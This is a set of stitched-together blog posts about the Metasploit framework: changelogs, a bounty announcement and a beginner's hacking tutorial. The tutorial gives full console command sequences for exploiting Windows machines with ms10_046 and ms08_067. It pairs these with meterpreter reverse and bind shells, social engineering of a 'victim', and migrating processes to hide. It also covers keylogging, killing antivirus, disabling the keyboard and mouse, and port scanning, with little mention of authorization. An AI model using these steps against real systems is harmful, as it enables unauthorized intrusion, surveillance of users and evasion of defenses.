“The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool . The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.“
Official Change LOG
Statistics:
Metasploit now ships with 716 exploit modules, 361 auxiliary modules, and 68 post modules.
20 new exploits, 3 new auxiliary modules, and 14 new post modules have been added since the last release (3.7.2)
New Modules since 3.7.2: New Exploit Modules:
VSFTPD v2.3.4 Backdoor Command Execution
Java RMI Server Insecure Default Configuration Java Code Execution
HP OpenViewNetwork Node Manager Toolbar.exe CGI Buffer Overflow
Feature #4982 – Support for custom executable with psexec
Feature #4856 – RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
Feature #4578 – Update Nmap XML parsers to support Nokogiri parsing
Feature #4417 – Post exploitation module to harvest OpenSSH credentials
Feature #4015 – Increase test coverage for railgun
Bug #4963 – Rework db_* commands for consistency
Bug #4892 – non-windows meterpreters upload into the wrong filename
Bug #4296 – Meterpreter stdapi registry functions create key if one doesn’texist
Bug #3565 – framework installer fails on RHEL (postgres taking too long to start)
Armitage: Armitage integrates with Metasploit 4.0 to:
Take advantage of the new Meterpreter payload stagers
Crack credentials with the click of a button
Run post modules against multiple hosts
Automatically log all post-exploitation activity
Revision Information:
Framework Revision 13462
Several import parsers were rewritten to use Nokogiri for much faster processing of large import files. Adding to Metasploit’s extensive payload support, Windows and Java Meterpreter now both support staging over HTTP and Windows can use HTTPS. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn’t perfect nor is it nearly as complete as the Windows version, but many features already work. Java applet signing is now done directly in Ruby, removing the need for a JDK for generating self-signed certificates. The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.
Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets.
The Metasploit® Framework is a free, open source penetration testing solution developed by the open source community & Rapid7. 11 new exploits, 1 new auxiliary module, and 15 new post modules have been added since the last release.
New Features:
Remote registry commands for Meterpreter
Import parsers moved to nokogiri streaming parsers (for quicker parsing of large XML files)
Updates to the egghunter payload to help the payload bypass DEP.
Welcome to the Metasploit Basics Part 3. In this part i will show you a live example of how to own a PC with some exploit and what to do after the Meterpreter session is opened. In short i will explain you about the Meterpreter.
The beauty of the Meterpreter is that it runs by injecting itself into the vulnerable running process on the remote system once exploitation occurs. All commands run through Meterpreter also execute within the context of the running process.
Meterpreter short form Meta-Interpreter .The Meterpreter is one of the advanced payloads available with the MSF. The way to look at the Meterpreter is not simply as a payload, but rather as an exploit platform that is executed on the remote system.The Meterpreter has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system.in short the meterpreter helps us to overcome the limitations and disadvantages of a individual payload like the adduser payload
I will be using my localhost and my virtual machine to demonstrate this so that you can understand better.I will own a XP box with my Backtrack and Metasploit. Unfortunately my XP was a patched version so i thought to use one exploit which gives a better chance to own a PC
msf > use windows/browser/ms10_046_shortcut_icon_dllloader msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms10_046_shortcut_icon_dllloader) > set lhost 192.168.56.128 ( your ip :P ) lhost => 192.168.56.128 msf exploit(ms10_046_shortcut_icon_dllloader) > set srvhost 192.168.56.128 ( localhost to listen on) srvhost => 192.168.56.128
Now i type exploit and the server starts ..
Now it up to you to do some clever social engineering regarding the situation your in.Give the Ip in which we have to give the [*] Using URL : http://192.168.56.128:80/ to the victim ( This is just my Local Host IP . If you are using Backtrack and metasploit on a virtual machine your ip will be 192.***.***.*** which may vary . Note- You cannot use this globally or over internet unless you forward your ip on the virtual machine. If you are using it as your Host OS or Live then on connect to the internet the ip becomes your your ISP ip which can be used over internet ) Have a look here
Now within a second this becomes ..
Ok now Part 1 and Part 2 have been shown practically. Time for Part 3 to start
Type in sessions to make sure we have an active session. Once we know we have one type in seesions -i and the id number next to the session you want to interact with.
We are in the meterpreter shell now we can do a lot of things there.
Now lets see the list of available commands in our meterpreter
meterpreter > help
Core Commands =============
Command Description ------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands ============================
Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory del Delete the specified file download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory
Command Description ------- ----------- ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table
Stdapi: System Commands =======================
Command Description ------- ----------- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getpid Get the current process identifier getprivs Attempt to enable all privileges available to the current process getuid Get the user that the server is running as kill Terminate a process ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands ===============================
Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components
Stdapi: Webcam Commands =======================
Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_list List webcams webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands ======================
Command Description ------- ----------- getsystem Attempt to elevate your privilege to that of local system.
Time Won't Allow me to explain all functions bit by bit . I will just brief it
Every time i break into a box i prefer seeking more information about i.So i type
meterpreter > sysinfo Computer : SAURAV-79E14E1B OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32
Impressive isn't it ?
Next I always migrate to a new process in order to hide myself. Be sure to choose something that is always running or you may get cut off. type the ps command to find out whats running.
Now to see a list of processes running i type ps
Now i migrate to another by typing migrate PID .. ex meterpreter > migrate 416 [*] Migrating to 416... [*] Migration completed successfully.
You can also disable the keyboard and the mouse and then re enable them.
meterpreter > uictl disable keyboard
Disabling keyboard...
meterpreter > uictl disable mouse
Disabling mouse...
meterpreter > uictl enablemouse
Enabling mouse...
meterpreter > uictl enablekeyboard
Enabling keyboard...
Now lets see how to sniff Keystrokes /m\ Commands in use keyscan_dump keyscan_start keyscan_stop
I made a very small video demonstrating this
The networking commands also help us a lot in the game
When i type the ipconfig command the meterpreter shows me all the network IPs to me.
meterpreter > ipconfig
WAN (PPP/SLIP) Interface Hardware MAC: 00:5*:45:00:00:00 IP Address : 5*.1**.1**.2 Netmask : 255.255.255.255
MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0
VMware Virtual Ethernet Adapter for VMnet1 Hardware MAC: 00:50:56:c5:00:01 IP Address : 192.168.38.1 Netmask : 255.255.255.0
VMware Virtual Ethernet Adapter for VMnet8 Hardware MAC: 00:50:56:c0:00:08 IP Address : 192.168.56.1 Netmask : 255.255.255.0
Using the System Commands .... This video will demonstrates some of the system commands at work when i try to download one file edit it and then upload it into a folder in the victims computer
Metasploit also allows you to use script on the victim from the meterpreter shell.Metasploit is coded in ruby so ruby scripts works well.There are a number of scripts already included in Metasploit if you know Ruby you can write your scripts also. i will not cover all the scripts but some
killav.rb (kills all anti viruses running on system) getcountermeasure.rb (kills av’s and fw’s/ids’) gettelnet.rb (able to open a telnet server on the customer with a username and password) checkvm.rb (checks to see if it is a VM. And version numbers) keylogrecorder.rb ( Records Keystroke ) netenum.rb search_dwld.rb winbf.rb credcollect.rb hostsedit.rb remotewinenum.rb scheduleme.rb schtasksabuse.rb wmic.rb get_local_subnets.rb migrate.rb ...... more
So lets run a some scripts so you understand the idea of what game is on
meterpreter > run killav [*] Killing Antivirus services on the target
[*] Killing off Monitor.exe
meterpreter > run checkvm [*] Checking if target is a Virtual Machine
[*] It appears to be physical host. meterpreter >
P.S - you can type script -h to get the available help from the script ex - run scraper -h
meterpreter > run keylogrecorder [*] firefox.exe Process found, migrating into 1812 [*] Migration Successful!! [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf3/logs/keylogrecorder/96.28.86.172_20091221.2422/96.28.86.172_20091221.2422.db [*] Recording ...
The strokes are saved to a database on the attackers machine for reference at a later date.
You can try the rest commands on your own. Time and Blogger wont permit me to explain more because this have become a large one. So Any suggestions , Praises are welcomed
---kudos to rapid7 community for such a good tool metasploit.---
The Metasploit team is excited to announce a new incentive for community exploit contributions: Cash! Running until July 20th, their Exploit Bounty program will pay out $5,000 in cash awards (in the form of American Express gift cards) to any community member that submits an accepted exploit module for an item from their Top 5 or Top 25 exploit lists. This is their way of saying thanks to the open source exploit development community and encouraging folks who may not have written Metasploit modules before to give it a try.
All accepted submissions will be available under the standard Metasploit Framework license (3-clause BSD). Exploit selection is first-come, first-serve; please see the official rules for more information.
Contributors will have a chance to claim a vulnerability from the Top 25 ($100) and Top 5 ($500) lists. Once a vulnerability has been claimed the contributor will be given one week to work on a module. After a week the vulnerability will be open again to the community. Prizes will only be paid out to the first module contributor for a given vulnerability. The process of claiming a vulnerability is an attempt at limiting situations where multiple contributors submit modules for the same vulnerability. To stake a claim, send an email to bounty@metasploit.com with the name of the vulnerability from the list below. All claims will be acknowledged, so please wait until receiving the acknowledgement before starting on the exploit. Each contributor can only have one outstanding claim at a time.
If you need help with the Metasploit module format, feel free to drop by the IRC channel (#metasploit on irc.freenode.net), and take a look at the some of the community documents:
1. Choose an exploit from the list below that has an empty Owner field. 2. Email bounty@metasploit.com and wait for an ackknowledgement of your claim. 3. Within one week, submit an exploit module to the Metasploit Redmine tracker as a new ticket with attachment. 4. Receive feedback on the module via Redmine and acceptance status.
Rules
All submissions must come from the Top 25 or Top 5 lists below
All exploits should be submitted to Metasploit Redmine. 1 ticket per exploit.
Modules MUST conform to the HACKING style guidelines
Should work reliably on all targets listed in the module.
Payment The program ends July 20th, this is the submission deadline for modules to be considered for the contest. Payment will be in the form of American Express gift cards sent within 60 days from the end of the program.
This may vary in your metasploit according to your version.
The Basic use of metasploit
1. Pick which exploit to use 2. Configure the exploit with remote IP address and remote port number 3. Pick a payload 4. Configure the payload with local IP address and local port number 5. Execute the exploit
Now time for a example
Type "show exploits" see the list of exploits available. Many of the exploits listed here are going to work against the target servers.But the difficult part is to know if the exploits will work or not =P
I will use
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >
Now time to see the exploit commands we type "help"
msf exploit(ms08_067_netapi) > help
Many commands arrives but i needed to check the exploits commands :( Yeh got it it is in the last :)
Exploit Commands ================
Command Description ------- ----------- check Check to see if a target is vulnerable exploit Launch an exploit attempt rcheck Reloads the module and checks if the target is vulnerable reload Just reloads the module rexploit Reloads the module and launches an exploit attempt
Now it is time to see some information about the exploit
type "info" to see this all magic happen
you will see many information about the exploit like name,version,available targets etc
in the above we were just seeking at the information about the exploit but the original stunt now comes
We will set the payload that will work after the exploitation is successful
To see the available payloads type "show payloads"
Now we will select a payload i prefer windows/meterpreter/bind_tcp
msf > exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp
type " show options " to see all available options that we have to fill up.
We need to set the RHOST ( The Victim ). We type set RHOST xxx.xxx.xxx.xxx ( X - The Ip Adreess) Now when you type show options you will see the RHOST will be filled with the ip address :)
The options varies from exploit to exploit sometimes it may even ask LHOST which you have to fill by your local ip or your computer ip that is also same you have to type set LHOST xxx.xxx.xxx.xxx
The 'set' command allows you to configure Framework options and parameters for the current module you are working with.
after all the options are filled up time to check the host before trying exploit it ..
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out. To perform the check type "check ". This may not work on all exploits. This will see if the server or target appears vulnerable. For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary
Now if you are sure all things went right type the command " exploit "
If successful you will see something like ( Appropriate )
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English [*] Selected Target: Windows XP SP0/SP1 Universal [*] Triggering the vulnerability... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:51333 -> xxx.xxx.xxx.xxx:4444)
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set RHOST [TARGET IP] msf exploit(ms08_067_netapi) > exploit
Now you own the PC it is yours you can do any thing with it i will not explain those here because another article wants it
The article is becoming longer . I have to make you understand auxiliary , nops and encoders in brief
The Auxiliary modules perform scanning, fuzzing, sniffing, information gathering and much more . This module does not give you a shell but they are equally important as the exploit and payloads.
I will take offensive security's help i cant write so much my hand is paining
Auxiliary Example
Port Scanning
In addition to running Nmap, there are a variety of other port scanners that are available to us within the framework.
Name Description ---- ----------- scanner/portscan/ack TCP ACK Firewall Scanner scanner/portscan/ftpbounce FTP Bounce Port Scanner scanner/portscan/syn TCP SYN Port Scanner scanner/portscan/tcp TCP Port Scanner scanner/portscan/xmas TCP "XMas" Port Scanner
The Result
msf > use auxiliary/scanner/portscan/syn msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set INTERFACE no The name of the interface PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > set INTERFACE eth0 INTERFACE => eth0 msf auxiliary(syn) > set PORTS 80 PORTS => 80 msf auxiliary(syn) > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf auxiliary(syn) > set THREADS 50 THREADS => 50 msf auxiliary(syn) > run
[*] TCP OPEN 192.168.1.1:80 [*] TCP OPEN 192.168.1.2:80 [*] TCP OPEN 192.168.1.10:80 [*] TCP OPEN 192.168.1.109:80 [*] TCP OPEN 192.168.1.116:80 [*] TCP OPEN 192.168.1.150:80 [*] Auxiliary module execution completed
The simplified NOP mixin provided in Msf::Simple::Nop extends each nop module instance with a method called generate_simple. This method takes the length of the sled to generate and the hash of options that should be used for the generation. On success, the return value is a buffer that is encoded using the Msf::Simple::Buffer class using the format specified in the option hash as the ’Format’ element. If no format is specified, the raw version of the NOP sled is returned.
Encoders
Encoder modules are used to generate transformed versions of raw payloads in a way that allows them to be restored to their original form at execution time and then subsequently executed. To accomplish this, most encoders will take the raw form of the payload and run it through some kind of encoding algorithm, like bitwise XOR. After the encoded version is generated, a decoding stub is prefixed to the encoded version of the payload. This stub is responsible for performing the inverse operation on the buffer attached to the decoder when it executes. After the decoder restores the payload to its original form, it will transfer execution to the start of the now normalized payload. To support the above described encoder model, the Metasploit framework provides the Msf::Encoder class which inherits from the Msf::Module base class. All encoders must inherit from the Msf::Encoder class at some level to ensure that encoder-specific methods are included in the derived class. Like the module information hash, encoders have some specialized information hash elements that describe information about the encoder being used. The information that encoder modules need to describe are the attributes of the decoder which is conveyed through the Decoder information hash element. The Decoder hash element references another hash that contains decoder specific properties. These are described in the table shown in figure 6.3 along with their types and module instance accessors.
Explaining NOPS and Encoders will make newbies confuse. So i will explain these latter
This is just the basic usages and was totally written for beginners more advance information about metasploit is waiting to be posted.
Replies , Questions and Suggestion regarding this topic is welcomed
This post will include basic introduction to metasploit & its working.
What is Metasploit ?
The Metasploit Project is an open-sourcecomputer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.
Basically Metasploit is tool which provides complete environment for hacking.
Metasploit is ran by rapid7 community & Metasploit is the biggest software which is written in ruby
Why metasploit is recommended ?
metasploit is free n easy to use and one can develop his own exploits,payloads etc & use it with metasploit easily.
It comes with over 690 exploits & which are updated on regular basis(0days also included).
We can use diffrent plugins,external tools to improve the productivity of metasploit for example SET(social engineering toolkit), beEF, XSSF, Nexpose , NMAP, W3af etc(we will continue to it in next posts)
Metasploit is available in 3 versions
Metasploit Pro - for pentester
Metasploit Express- for IT security teams
Metasploit Framework - Its an open source & avialable for download for free
To take advantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system. Exploits often deliver a payload to the target system to grant the attacker access to the system.Here is a article on basic working of EXPLOITS
What is a payload? A payload is the piece of software that lets you control a computer system after it’s been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there.
Basically payload is the way you want to hack your target.Meterpreter is the most reliable payload & we will use it in most of the cases ahead
What is auxiliary?
Metasploit comes with 358 auxiliary.Basically auxiliary is used for information gathering before exploitation for ex if the machine is vulnerable to an attack or not . Here is video on email extractor auxiliary.
What are Nops & Encoders?
Metasploit comes with 8nops & 27 encoders these are used to bypass antiviruses/firewall via different techniques
So moving on to metasploit framework & some important commands metasploit console is easy to understand if one uses his common sense
the help command does the trick.It shows all the commands available in metasploit.
We will move onto series of discussions & tutorial on metasploit later
